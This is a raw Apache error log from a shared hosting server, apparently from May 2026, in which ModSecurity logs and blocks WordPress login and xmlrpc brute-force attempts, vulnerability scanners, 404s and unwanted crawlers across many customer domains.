[Tue May 26 15:43:15.797914 2026] [security2:error] [pid 733610:tid 733772] [client 103.153.130.62:61080] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyO8LL_4PasUNKBsflegAAACA"]
[Tue May 26 15:43:16.842328 2026] [security2:error] [pid 733610:tid 733832] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyPMLL_4PasUNKBsfliwAAAFw"]
[Tue May 26 15:43:18.270109 2026] [security2:error] [pid 733610:tid 733790] [client 223.123.35.44:35759] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyPcLL_4PasUNKBsflxQAAADI"]
[Tue May 26 15:43:18.270221 2026] [security2:error] [pid 733610:tid 733790] [client 223.123.35.44:35759] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyPcLL_4PasUNKBsflxQAAADI"]
[Tue May 26 15:43:18.395879 2026] [security2:error] [pid 733610:tid 733815] [client 91.224.92.34:59243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.92.224.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.samayikprasanga.in"] [uri "/wp-login.php"] [unique_id "ahVyPsLL_4PasUNKBsfl0QAAAEs"]
[Tue May 26 15:43:18.658409 2026] [security2:error] [pid 733610:tid 733805] [client 92.246.140.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyPsLL_4PasUNKBsfl1AAAAEE"]
[Tue May 26 15:43:18.937737 2026] [security2:error] [pid 733610:tid 733859] [client 91.224.92.34:54031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.92.224.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.samayikprasanga.in"] [uri "/wp-login.php"] [unique_id "ahVyPsLL_4PasUNKBsfl8AAAAHc"], referer: https://duckduckgo.com/
[Tue May 26 15:43:19.276541 2026] [security2:error] [pid 733610:tid 733747] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyPsLL_4PasUNKBsfl7AAAAAc"]
[Tue May 26 15:43:21.080178 2026] [security2:error] [pid 733610:tid 733743] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyQMLL_4PasUNKBsfmLAAAAAM"]
[Tue May 26 15:43:21.565373 2026] [autoindex:error] [pid 733610:tid 733799] [client 40.160.16.154:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:43:23.116023 2026] [autoindex:error] [pid 733610:tid 733799] [client 40.160.16.154:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:43:23.591682 2026] [security2:error] [pid 733610:tid 733761] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyQ8LL_4PasUNKBsfmjgAAABU"]
[Tue May 26 15:43:23.621029 2026] [security2:error] [pid 733610:tid 733840] [client 91.224.92.34:50762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.92.224.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.saamita.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVyQ8LL_4PasUNKBsfmnAAAAGQ"], referer: https://duckduckgo.com/
[Tue May 26 15:43:23.725167 2026] [security2:error] [pid 733610:tid 733808] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyQ8LL_4PasUNKBsfmogAAAEQ"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1261213&moderation-hash=c3216d971620d5dae8b0519854a3d0bc
[Tue May 26 15:43:23.966544 2026] [security2:error] [pid 733610:tid 733774] [client 91.224.92.34:59568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.92.224.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.saamita.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVyQ8LL_4PasUNKBsfmqwAAACI"]
[Tue May 26 15:43:25.039329 2026] [security2:error] [pid 733610:tid 733822] [client 91.224.92.34:59911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.92.224.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.saptrainingsonline.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVyRcLL_4PasUNKBsfm1AAAAFI"]
[Tue May 26 15:43:25.256602 2026] [security2:error] [pid 733610:tid 733797] [client 23.158.233.122:50697] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVyRcLL_4PasUNKBsfm1QAAADk"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 15:43:25.256769 2026] [security2:error] [pid 733610:tid 733797] [client 23.158.233.122:50697] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVyRcLL_4PasUNKBsfm1QAAADk"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 15:43:25.351717 2026] [security2:error] [pid 733610:tid 733853] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyRMLL_4PasUNKBsfm0AAAAHE"]
[Tue May 26 15:43:25.386653 2026] [security2:error] [pid 733610:tid 733750] [client 91.224.92.34:61907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.92.224.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.saptrainingsonline.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVyRcLL_4PasUNKBsfm4AAAAAo"]
[Tue May 26 15:43:25.606042 2026] [security2:error] [pid 733610:tid 733856] [client 23.158.233.122:50726] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVyRcLL_4PasUNKBsfm5AAAAHQ"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 15:43:26.052848 2026] [security2:error] [pid 733610:tid 733836] [client 103.153.130.62:61340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyRsLL_4PasUNKBsfm8wAAAGA"]
[Tue May 26 15:43:26.053061 2026] [security2:error] [pid 733610:tid 733836] [client 103.153.130.62:61340] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyRsLL_4PasUNKBsfm8wAAAGA"]
[Tue May 26 15:43:26.461051 2026] [security2:error] [pid 733610:tid 733766] [client 91.224.92.34:58690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.92.224.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.sarkarihelpresult.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVyRsLL_4PasUNKBsfm-wAAABo"], referer: https://www.facebook.com/
[Tue May 26 15:43:26.813895 2026] [security2:error] [pid 733610:tid 733799] [client 91.224.92.34:50342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.92.224.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.sarkarihelpresult.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVyRsLL_4PasUNKBsfnBQAAADs"], referer: https://www.bing.com/
[Tue May 26 15:43:27.445498 2026] [security2:error] [pid 733610:tid 733751] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyR8LL_4PasUNKBsfnCwAAAAs"]
[Tue May 26 15:43:29.281983 2026] [security2:error] [pid 733610:tid 733743] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyScLL_4PasUNKBsfnUQAAAAM"], referer: http://anujtradingco.com/
[Tue May 26 15:43:29.471229 2026] [security2:error] [pid 733610:tid 733811] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyScLL_4PasUNKBsfnSwAAAEc"]
[Tue May 26 15:43:31.059069 2026] [security2:error] [pid 733610:tid 733798] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVySsLL_4PasUNKBsfnhgAAADo"]
[Tue May 26 15:43:32.032260 2026] [security2:error] [pid 733610:tid 733821] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyS8LL_4PasUNKBsfnsgAAAFE"], referer: https://anujtradingco.com/
[Tue May 26 15:43:33.264997 2026] [security2:error] [pid 733610:tid 733704] [remote 113.190.40.93:52022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVyTcLL_4PasUNKBsfn0gAAMF0"]
[Tue May 26 15:43:33.441380 2026] [security2:error] [pid 733610:tid 733861] [client 103.112.43.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVyTMLL_4PasUNKBsfn0QAAAHk"]
[Tue May 26 15:43:33.560226 2026] [security2:error] [pid 733610:tid 733834] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyTcLL_4PasUNKBsfn1QAAAF4"]
[Tue May 26 15:43:35.243309 2026] [security2:error] [pid 733610:tid 733860] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyTsLL_4PasUNKBsfoAAAAAHg"]
[Tue May 26 15:43:36.683334 2026] [security2:error] [pid 733610:tid 733740] [client 103.153.130.62:61610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyUMLL_4PasUNKBsfoLwAAAAA"]
[Tue May 26 15:43:36.683525 2026] [security2:error] [pid 733610:tid 733740] [client 103.153.130.62:61610] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyUMLL_4PasUNKBsfoLwAAAAA"]
[Tue May 26 15:43:37.634945 2026] [security2:error] [pid 733610:tid 733747] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyUcLL_4PasUNKBsfoRAAAAAc"]
[Tue May 26 15:43:38.163312 2026] [security2:error] [pid 733610:tid 733821] [client 113.189.98.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyUcLL_4PasUNKBsfoUgAAAFE"]
[Tue May 26 15:43:39.006924 2026] [security2:error] [pid 733610:tid 733783] [client 74.125.208.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVyUsLL_4PasUNKBsfoawAAACs"]
[Tue May 26 15:43:39.773458 2026] [security2:error] [pid 733610:tid 733824] [client 74.7.228.59:59642] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "khatucity.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVyU8LL_4PasUNKBsfooAAAVEs"]
[Tue May 26 15:43:40.026210 2026] [security2:error] [pid 733610:tid 733789] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyU8LL_4PasUNKBsfomwAAADE"]
[Tue May 26 15:43:42.131031 2026] [security2:error] [pid 733610:tid 733806] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyVcLL_4PasUNKBsfo6gAAAEI"]
[Tue May 26 15:43:42.150671 2026] [security2:error] [pid 733610:tid 733655] [remote 54.38.29.86:50360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVyVcLL_4PasUNKBsfo7wAAZiw"]
[Tue May 26 15:43:42.475346 2026] [security2:error] [pid 733610:tid 733757] [client 114.119.133.194:33925] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVyVsLL_4PasUNKBsfo_QAAABE"], referer: http://haddingtonwines.com/cart?remove_item=c0a62e133894cdce435bcb4a5df1db2d
[Tue May 26 15:43:43.865643 2026] [security2:error] [pid 733610:tid 733814] [client 152.232.72.126:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyV8LL_4PasUNKBsfpKQAAAEo"], referer: https://www.anujtradingco.com/
[Tue May 26 15:43:44.114274 2026] [security2:error] [pid 733610:tid 733833] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyV8LL_4PasUNKBsfpIwAAAF0"]
[Tue May 26 15:43:45.066236 2026] [security2:error] [pid 733610:tid 733821] [client 152.232.72.126:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyWMLL_4PasUNKBsfpUwAAAFE"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1451658&moderation-hash=e1d6a6b8e4284daf45d45ed63eb70ee7
[Tue May 26 15:43:46.229699 2026] [security2:error] [pid 733610:tid 733844] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyWcLL_4PasUNKBsfpbwAAAGg"]
[Tue May 26 15:43:46.852967 2026] [security2:error] [pid 733610:tid 733778] [client 103.153.130.62:61875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyWsLL_4PasUNKBsfplgAAACY"]
[Tue May 26 15:43:46.853092 2026] [security2:error] [pid 733610:tid 733778] [client 103.153.130.62:61875] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyWsLL_4PasUNKBsfplgAAACY"]
[Tue May 26 15:43:48.393586 2026] [security2:error] [pid 733610:tid 733819] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyW8LL_4PasUNKBsfptwAAAE8"]
[Tue May 26 15:43:49.298799 2026] [security2:error] [pid 733610:tid 733677] [remote 103.11.102.106:36854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVyXcLL_4PasUNKBsfp2QAAOUI"]
[Tue May 26 15:43:50.866104 2026] [security2:error] [pid 733610:tid 733776] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyXsLL_4PasUNKBsfqCwAAACQ"]
[Tue May 26 15:43:51.316787 2026] [security2:error] [pid 733610:tid 733846] [client 158.62.221.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyX8LL_4PasUNKBsfqKAAAAGo"], referer: https://www.anujtradingco.com/
[Tue May 26 15:43:51.854602 2026] [security2:error] [pid 733610:tid 733763] [client 114.119.132.218:38811] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/membresia.html"] [unique_id "ahVyX8LL_4PasUNKBsfqMQAAABc"], referer: http://politica-global.com/
[Tue May 26 15:43:52.616018 2026] [security2:error] [pid 733610:tid 733824] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyYMLL_4PasUNKBsfqPgAAAFQ"]
[Tue May 26 15:43:52.919641 2026] [security2:error] [pid 733610:tid 733816] [client 223.123.35.44:35762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyYMLL_4PasUNKBsfqTAAAAEw"]
[Tue May 26 15:43:52.919812 2026] [security2:error] [pid 733610:tid 733816] [client 223.123.35.44:35762] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyYMLL_4PasUNKBsfqTAAAAEw"]
[Tue May 26 15:43:53.373219 2026] [security2:error] [pid 733610:tid 733748] [client 158.62.221.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyYcLL_4PasUNKBsfqYwAAAAg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 15:43:54.053615 2026] [security2:error] [pid 733610:tid 733749] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyYcLL_4PasUNKBsfqbgAAAAk"]
[Tue May 26 15:43:56.789983 2026] [security2:error] [pid 733610:tid 733745] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyZMLL_4PasUNKBsfqvAAAAAU"]
[Tue May 26 15:43:57.304355 2026] [security2:error] [pid 733610:tid 733818] [client 208.91.198.85:57852] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahVyZcLL_4PasUNKBsfq1gAAAE4"]
[Tue May 26 15:43:57.372727 2026] [security2:error] [pid 733610:tid 733793] [client 103.153.130.62:62161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyZcLL_4PasUNKBsfq2gAAADU"]
